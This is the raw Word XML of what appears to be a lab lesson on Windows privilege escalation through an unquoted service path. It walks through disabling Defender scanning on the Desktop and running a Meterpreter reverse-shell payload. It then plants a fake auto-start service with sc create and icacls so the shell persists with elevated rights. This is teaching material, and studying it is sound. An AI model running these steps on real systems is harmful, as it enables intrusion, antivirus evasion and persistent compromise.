            <wp:extent cx="4019550" cy="139538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55" cy="140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28DF" w14:textId="4FAD0993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 xml:space="preserve">Exclude your Desktop folder. This will stop Windows Defender from blocking and quarantining your payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C553215" w14:textId="036B2EAC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you have the payload saved to your target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'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s desktop, make sure you have your listener on Kali up and ready to receive.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Then, f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">rom your target’s desktop, x2 the update.exe payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E395418" w14:textId="6620BB44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the SmartScreen warning pops up, press the run button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F14AC" w14:textId="10BD0EC0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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC54C34" wp14:editId="32E3ADE7">
            <wp:extent cx="3234477" cy="194310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90" cy="195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692" w14:textId="3E3203ED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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>When the UAC pops up, press the yes button.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 xml:space="preserve">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>Next, l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 xml:space="preserve">ook at </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003E2088">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Kali terminal. You should now have a Meterpreter session established between your Windows target and your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A032E9C" w14:textId="5F041661" w:rsidR="003002CB" w:rsidRDefault="003002C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  <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3449E22B" wp14:editId="5ED1B7B7">
            <wp:extent cx="2680694" cy="2019300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663" cy="202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F962" w14:textId="7C6571E3" w:rsidR="00C42749" w:rsidRDefault="00C42749" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C42749">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows Privilege Escalation: Unquoted Service Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF1C75" w14:textId="1FCD637B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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once we launch the payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad, the Windows 10 target will establish a reverse shell with our Kali machine. We can confirm this by the presence of a Meterpreter prompt on our Kali terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECD99F" w14:textId="6DCF040F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06684D82" wp14:editId="306A6961">
            <wp:extent cx="594360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52A1" w14:textId="739C7202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At the Meterpreter prompt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type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00563C1D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr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and press enter. </w:t>
      </w:r>
      <w:r w:rsidRPr="00563C1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">his will drop us down into </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">command prompt on our Windows 10 target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F05DE2" w14:textId="3C3F3116" w:rsidR="00563C1D" w:rsidRDefault="00563C1D" w:rsidP="00C42749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4D2E502F" wp14:editId="04C6EE2C">
            <wp:extent cx="4477375" cy="120031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F54D" w14:textId="193F502A" w:rsidR="00563C1D" w:rsidRPr="003C1BA6" w:rsidRDefault="00563C1D" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for an existing </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk86303411"/>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unquoted Service Path </w:t>
      </w:r>
      <w:r w:rsidR="003C1BA6" w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="00B06072" w14:textId="502699FC" w:rsidR="00563C1D" w:rsidRDefault="003C1BA6" w:rsidP="00C42749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We can check any windows machine for an </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unquoted Service Path vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using the following script</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00563C1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At the shell prompt, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidR="00563C1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and paste the following script to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8C628" w14:textId="744A4381" w:rsidR="00ED4E7B" w:rsidRDefault="00ED4E7B" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading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wmic service get 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name,displayname,pathname,startmode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“auto”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/v “c:\windows\\” |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findstr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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F79B2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/v “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CAF5C" w14:textId="5167E908" w:rsidR="003C1BA6" w:rsidRDefault="003C1BA6" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading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3C1BA6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A63CBE6" wp14:editId="50E1EBE0">
            <wp:extent cx="5943600" cy="7600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65C" w14:textId="0A557A5B" w:rsidR="003C1BA6" w:rsidRPr="003C1BA6" w:rsidRDefault="003C1BA6" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Create an Unquoted Service Path vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C9C9C4" w14:textId="3DE3B498" w:rsidR="003C1BA6" w:rsidRDefault="003C1BA6" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We don’t have an existing Unquoted Service Path vulnerability,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> but we can create a fake service with the vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63940548" w14:textId="02D88926" w:rsidR="003C1BA6" w:rsidRPr="003C1BA6" w:rsidRDefault="003C1BA6" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Create a directory for the fake service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BF85F" w14:textId="467A9F32" w:rsidR="00EE6990" w:rsidRPr="003C1BA6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mkdir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 xml:space="preserve"> "C:\Program Files\</w:t>
      </w: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NotLegit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\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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BadService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1BA6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB45B16" w14:textId="1F803479" w:rsidR="00EE6990" w:rsidRDefault="003C1BA6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24FC9" wp14:editId="4F22F380">
            <wp:extent cx="4848225" cy="6137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57" cy="61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BD7B" w14:textId="5C89DEB4" w:rsidR="003C1BA6" w:rsidRPr="00EE6990" w:rsidRDefault="003C1BA6" w:rsidP="00EE699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Create a fake service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E171728" w14:textId="5B89BEAE" w:rsidR="00EE6990" w:rsidRPr="00B16653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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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sc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 xml:space="preserve"> create "</w:t>
      </w:r>
      <w:r w:rsidR="00EA7C74" w:rsidRPr="00B16653">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I am not a real service</w:t>
      </w:r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 xml:space="preserve">" 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binpath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= "C:\Program Files\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NotLegit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\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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BadService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\</w:t>
      </w:r>
      <w:r w:rsidR="00EA7C74" w:rsidRPr="00B16653">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16653">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.exe" start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E05443" w14:textId="59142648" w:rsidR="00EE6990" w:rsidRDefault="00B16653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0B065A" wp14:editId="4AA6C2F7">
            <wp:extent cx="59436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8147" w14:textId="03A2877E" w:rsidR="00B16653" w:rsidRPr="002869DB" w:rsidRDefault="00B16653" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002869DB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Give the built-in users group write access to the root folder of the fake service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770D7C8E" w14:textId="6F91DDE9" w:rsidR="00EE6990" w:rsidRPr="002869DB" w:rsidRDefault="00EE6990" w:rsidP="00EE6990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002869DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002869DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002869DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NotLegit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002869DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" /grant "BUILTIN\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002869DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Users":W</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B705B34" w14:textId="623C2036" w:rsidR="00EE6990" w:rsidRDefault="00B16653" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading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C8CEBA" wp14:editId="6F6B7D24">
            <wp:extent cx="59436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B293" w14:textId="601B7BEE" w:rsidR="00B16653" w:rsidRPr="00EE6990" w:rsidRDefault="00B16653" w:rsidP="00EE699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Check the folder permission for the fake service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DAE9F7" w14:textId="08B8A3AD" w:rsidR="00EE6990" w:rsidRDefault="00EE6990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proofErr w:type="spellStart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icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> "C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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NotLegit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B16653">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BE33D" w14:textId="4831E303" w:rsidR="00B16653" w:rsidRDefault="00B16653" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FEA2CCA" wp14:editId="24F4B8E6">
            <wp:extent cx="5019675" cy="18180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974" cy="182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B398" w14:textId="3847E4D8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 w:rsidRPr="0094082D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exit the Windows 10 shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39230650" w14:textId="6D7B12A1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ED79A4C" wp14:editId="4A0DF804">
            <wp:extent cx="3000375" cy="628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90B1" w14:textId="6F9280D5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Type quit at the meterpreter prompt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62656E21" w14:textId="27C6E287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 w:rsidRPr="0094082D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BCC5741" wp14:editId="493C4243">
            <wp:extent cx="5468113" cy="457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14E3" w14:textId="61738FDE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Use your up arrow to reload the </w:t>
      </w:r>
      <w:r w:rsidR="00C87783">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">settings for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload, IP address for the LHOST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and the listening port for the LPORT. </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Finally, t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ype </w:t>
      </w:r>
      <w:r w:rsidRPr="00763484">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create another reverse shell listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DEB165" w14:textId="53047B44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551893DD" wp14:editId="02948F32">
            <wp:extent cx="58197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B365" w14:textId="47A83FA4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Restart your </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">indows 10 target. Watch your Kali terminal. Once the fake servicer service starts, we will have </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00026209">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133191B" w14:textId="436B48BA" w:rsidR="0094082D" w:rsidRDefault="00026209" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563C1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="214850AC" wp14:editId="249B0B45">
            <wp:extent cx="5943600" cy="655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7E94" w14:textId="05D1CF81" w:rsidR="00864810" w:rsidRDefault="00864810" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864810">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Summary –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1249B9" w14:textId="59A21884" w:rsidR="00864810" w:rsidRPr="00864810" w:rsidRDefault="00864810" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864810">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this lesson</w:t>
      </w:r>
      <w:r w:rsidR="00763484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you learned to detect and create a</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unquoted Service Path vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will create a persistent revere shell </w:t>
      </w:r>
      <w:r w:rsidR="0086082C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and elevate your privileges </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">each time the machine is restarted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50BCE3" w14:textId="77777777" w:rsidR="00864810" w:rsidRDefault="00864810" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB06AFA" w14:textId="77777777" w:rsidR="0094082D" w:rsidRDefault="0094082D" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F41DFB9" w14:textId="77777777" w:rsidR="0094082D" w:rsidRPr="0094082D" w:rsidRDefault="0094082D" w:rsidP="00EE6990">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EC601E" w14:textId="77777777" w:rsidR="00C42749" w:rsidRPr="00C42749" w:rsidRDefault="00C42749" w:rsidP="00C42749">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADB81AC" w14:textId="77777777" w:rsidR="00C42749" w:rsidRDefault="00C42749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405077F8" w14:textId="77777777" w:rsidR="00C020C6" w:rsidRDefault="00C020C6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AD1C559" w14:textId="77777777" w:rsidR="00B75233" w:rsidRPr="000863FC" w:rsidRDefault="00B75233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50C5C988" w14:textId="77777777" w:rsidR="00CB6EFC" w:rsidRPr="00B00B85" w:rsidRDefault="00CB6EFC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62220397" w14:textId="77777777" w:rsidR="004D17F7" w:rsidRPr="002C4D1A" w:rsidRDefault="004D17F7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EBC0C53" w14:textId="710A3B58" w:rsidR="0034148B" w:rsidRPr="00E87C6C" w:rsidRDefault="0034148B" w:rsidP="00E87C6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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A12570" w14:textId="77777777" w:rsidR="00A66F1D" w:rsidRDefault="00A66F1D"/>
    <w:sectPr w:rsidR="00A66F1D">
      <w:footerReference w:type="defaul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71F9" w14:textId="77777777" w:rsidR="00B852F4" w:rsidRDefault="00B852F4" w:rsidP="00D3285B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="26DF1E86" w14:textId="77777777" w:rsidR="00B852F4" w:rsidRDefault="00B852F4" w:rsidP="00D3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4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9AC84" w14:textId="21AA40EB" w:rsidR="00D3285B" w:rsidRDefault="00D32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A59BB" w14:textId="77777777" w:rsidR="00D3285B" w:rsidRDefault="00D3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2DCC" w14:textId="77777777" w:rsidR="00B852F4" w:rsidRDefault="00B852F4" w:rsidP="00D3285B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
